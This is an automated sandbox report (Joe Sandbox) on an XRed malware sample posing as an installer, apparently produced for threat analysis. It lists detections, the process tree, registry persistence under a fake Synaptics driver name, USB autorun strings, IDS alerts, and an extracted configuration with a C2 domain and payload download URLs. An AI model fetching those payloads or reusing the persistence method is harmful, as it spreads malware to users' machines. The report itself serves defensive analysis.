Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Dzsb.Qyd.Install.exe

Overview

General Information

Sample name:Dzsb.Qyd.Install.exe
Analysis ID:1556405
MD5:8f6f7010f18c00958433f02d47130dd1
SHA1:96420693a48930b1420dca7c5d02792ea7009693
SHA256:f20191f25cc57ee5c30328a5bd3821788d8db2ed60901f728122d596185fc651
Infos:

Detection

XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files

Classification

  • System is w10x64_ra
  • Dzsb.Qyd.Install.exe (PID: 7060 cmdline: "C:\Users\user\Desktop\Dzsb.Qyd.Install.exe" MD5: 8F6F7010F18C00958433F02D47130DD1)
    • ._cache_Dzsb.Qyd.Install.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exe" MD5: 2CE4CD44B3F4B4527FF1BA1D40B3C6BC)
    • Synaptics.exe (PID: 3588 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 921D4ED8B1BD7EFFC64D14DF5204C817)
      • WerFault.exe (PID: 4252 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3588 -s 2896 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 5892 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 4592 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • rundll32.exe (PID: 1948 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • Synaptics.exe (PID: 6056 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 921D4ED8B1BD7EFFC64D14DF5204C817)
    • WerFault.exe (PID: 548 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 6328 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 4104 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
SourceRuleDescriptionAuthorStrings
Dzsb.Qyd.Install.exeJoeSecurity_XRedYara detected XRedJoe Security
    Dzsb.Qyd.Install.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\Synaptics\RCXE0B2.tmpJoeSecurity_XRedYara detected XRedJoe Security
        C:\ProgramData\Synaptics\RCXE0B2.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          C:\Users\user\Documents\DUUDTUBZFW\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
            C:\Users\user\Documents\DUUDTUBZFW\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              C:\Users\user\Documents\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
                Click to see the 3 entries
                SourceRuleDescriptionAuthorStrings
                00000000.00000000.1244560230.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                  00000000.00000000.1244560230.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    00000003.00000003.1274914579.0000000000694000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                      Process Memory Space: Dzsb.Qyd.Install.exe PID: 7060JoeSecurity_XRedYara detected XRedJoe Security
                        Process Memory Space: Synaptics.exe PID: 3588JoeSecurity_XRedYara detected XRedJoe Security
                          SourceRuleDescriptionAuthorStrings
                          0.0.Dzsb.Qyd.Install.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                            0.0.Dzsb.Qyd.Install.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                              System Summary

                              barindex
                              Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 13.107.246.45, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 5892, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49781
                              Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.16, DestinationIsIpv6: false, DestinationPort: 49781, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 5892, Protocol: tcp, SourceIp: 13.107.246.45, SourceIsIpv6: false, SourcePort: 443
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Dzsb.Qyd.Install.exe, ProcessId: 7060, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 3588, TargetFilename: C:\Users\user\AppData\Local\Temp\I9FyyXRL.xlsm
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-11-15T11:24:40.556228+010020283713Unknown Traffic192.168.2.164978113.107.246.45443TCP
                              2024-11-15T11:24:48.608299+010020283713Unknown Traffic192.168.2.164981613.107.246.45443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-11-15T11:23:35.970223+010020448871A Network Trojan was detected192.168.2.1649708142.250.186.78443TCP
                              2024-11-15T11:23:36.016711+010020448871A Network Trojan was detected192.168.2.1649709142.250.186.78443TCP
                              2024-11-15T11:23:37.221878+010020448871A Network Trojan was detected192.168.2.1649712142.250.186.78443TCP
                              2024-11-15T11:23:37.282448+010020448871A Network Trojan was detected192.168.2.1649714142.250.186.78443TCP
                              2024-11-15T11:23:38.477084+010020448871A Network Trojan was detected192.168.2.1649719142.250.186.78443TCP
                              2024-11-15T11:23:38.512493+010020448871A Network Trojan was detected192.168.2.1649720142.250.186.78443TCP
                              2024-11-15T11:23:39.997079+010020448871A Network Trojan was detected192.168.2.1649728142.250.186.78443TCP
                              2024-11-15T11:23:40.003936+010020448871A Network Trojan was detected192.168.2.1649727142.250.186.78443TCP
                              2024-11-15T11:23:41.223641+010020448871A Network Trojan was detected192.168.2.1649733142.250.186.78443TCP
                              2024-11-15T11:23:41.224036+010020448871A Network Trojan was detected192.168.2.1649735142.250.186.78443TCP
                              2024-11-15T11:23:42.466260+010020448871A Network Trojan was detected192.168.2.1649738142.250.186.78443TCP
                              2024-11-15T11:23:42.466655+010020448871A Network Trojan was detected192.168.2.1649737142.250.186.78443TCP
                              2024-11-15T11:23:43.988205+010020448871A Network Trojan was detected192.168.2.1649746142.250.186.78443TCP
                              2024-11-15T11:23:43.991183+010020448871A Network Trojan was detected192.168.2.1649747142.250.186.78443TCP
                              2024-11-15T11:23:45.225404+010020448871A Network Trojan was detected192.168.2.1649753142.250.186.78443TCP
                              2024-11-15T11:23:45.235927+010020448871A Network Trojan was detected192.168.2.1649751142.250.186.78443TCP
                              2024-11-15T11:23:46.440222+010020448871A Network Trojan was detected192.168.2.1649755142.250.186.78443TCP
                              2024-11-15T11:23:46.447453+010020448871A Network Trojan was detected192.168.2.1649756142.250.186.78443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-11-15T11:23:36.267286+010028326171Malware Command and Control Activity Detected192.168.2.164971169.42.215.25280TCP
                              2024-11-15T11:24:38.185016+010028326171Malware Command and Control Activity Detected192.168.2.164977169.42.215.25280TCP

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: Dzsb.Qyd.Install.exeAvira: detected
                              Source: Dzsb.Qyd.Install.exeAvira: detected
                              Source: http://xred.site50.net/syn/Synaptics.rarZAvira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/SUpdate.iniZAvira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/Synaptics.rarXAvira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/SSLLibrary.dl4Avira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/SSLLibrary.dll6Avira URL Cloud: Label: malware
                              Source: C:\ProgramData\Synaptics\RCXE0B2.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\RCXE0B2.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: Dzsb.Qyd.Install.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                              Source: C:\ProgramData\Synaptics\RCXE0B2.tmpReversingLabs: Detection: 87%
                              Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1ReversingLabs: Detection: 87%
                              Source: C:\Users\user\Documents\~$cache1ReversingLabs: Detection: 87%
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.2% probability
                              Source: C:\ProgramData\Synaptics\RCXE0B2.tmpJoe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Joe Sandbox ML: detected
                              Source: C:\Users\user\Documents\~$cache1Joe Sandbox ML: detected
                              Source: Dzsb.Qyd.Install.exeJoe Sandbox ML: detected
                              Source: Dzsb.Qyd.Install.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49708 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49709 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49712 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49713 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49715 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49714 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49719 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49720 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49721 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49722 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49727 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49728 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49729 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49735 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49734 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49733 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49736 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49738 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49737 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49739 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49740 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49747 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49746 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49752 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49754 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49753 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49751 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49755 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49756 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49757 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49758 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49760 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.16:49761 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49762 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49765 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49768 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49769 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49772 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49773 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49775 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49774 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49777 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49778 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49779 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49780 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.16:49781 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49790 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49789 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49792 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49791 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49793 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49795 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49794 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49796 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49802 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49803 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49808 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49807 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49810 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49809 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49811 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49812 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49822 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49823 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49824 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49827 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49826 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49828 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49825 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49830 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49831 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49832 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49833 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49840 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49841 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49842 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49843 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49845 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49846 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49849 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.16:49850 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49851 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.16:49852 version: TLS 1.2
                              Source: Binary string: d:\CSharp\Dzsb.Qyd\Dzsb.Qyd.Install\Debug\Dzsb.Qyd.Install.pdb source: Dzsb.Qyd.Install.exe, Synaptics.exe.0.dr, ._cache_Dzsb.Qyd.Install.exe.0.dr
                              Source: Dzsb.Qyd.Install.exe, 00000000.00000000.1244560230.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: Dzsb.Qyd.Install.exe, 00000000.00000000.1244560230.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: Dzsb.Qyd.Install.exe, 00000000.00000000.1244560230.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                              Source: Synaptics.exe, 00000003.00000003.1274914579.0000000000694000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.1274914579.0000000000694000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.1274914579.0000000000694000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: Dzsb.Qyd.Install.exeBinary or memory string: [autorun]
                              Source: Dzsb.Qyd.Install.exeBinary or memory string: [autorun]
                              Source: Dzsb.Qyd.Install.exeBinary or memory string: autorun.inf
                              Source: RCXE0B2.tmp.0.drBinary or memory string: [autorun]
                              Source: RCXE0B2.tmp.0.drBinary or memory string: [autorun]
                              Source: RCXE0B2.tmp.0.drBinary or memory string: autorun.inf
                              Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                              Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                              Source: Synaptics.exe.0.drBinary or memory string: autorun.inf
                              Source: ~$cache1.3.drBinary or memory string: [autorun]
                              Source: ~$cache1.3.drBinary or memory string: [autorun]
                              Source: ~$cache1.3.drBinary or memory string: autorun.inf
                              Source: ~$cache1.20.drBinary or memory string: [autorun]
                              Source: ~$cache1.20.drBinary or memory string: [autorun]
                              Source: ~$cache1.20.drBinary or memory string: autorun.inf
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: excel.exeMemory has grown: Private usage: 8MB later: 71MB

                              Networking

                              barindex
                              Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.16:49711 -> 69.42.215.252:80
                              Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.16:49771 -> 69.42.215.252:80
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) : 192.168.2.16:49712 -> 142.250.186.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) : 192.168.2.16:49709 -> 142.250.186.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) : 192.168.2.16:49714 -> 142.250.186.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) : 192.168.2.16:49728 -> 142.250.186.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) : 192.168.2.16:49720 -> 142.250.186.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) : 192.168.2.16:49719 -> 142.250.186.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) : 192.168.2.16:49727 -> 142.250.186.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) : 192.168.2.16:49708 -> 142.250.186.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) : 192.168.2.16:49746 -> 142.250.186.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) : 192.168.2.16:49753 -> 142.250.186.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) : 192.168.2.16:49756 -> 142.250.186.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) : 192.168.2.16:49735 -> 142.250.186.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) : 192.168.2.16:49738 -> 142.250.186.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) : 192.168.2.16:49751 -> 142.250.186.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) : 192.168.2.16:49737 -> 142.250.186.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) : 192.168.2.16:49755 -> 142.250.186.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) : 192.168.2.16:49733 -> 142.250.186.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) : 192.168.2.16:49747 -> 142.250.186.78:443
                              Source: Malware configuration extractorURLs: xred.mooo.com
                              Source: unknownDNS query: name: freedns.afraid.org
                              Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
                              Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
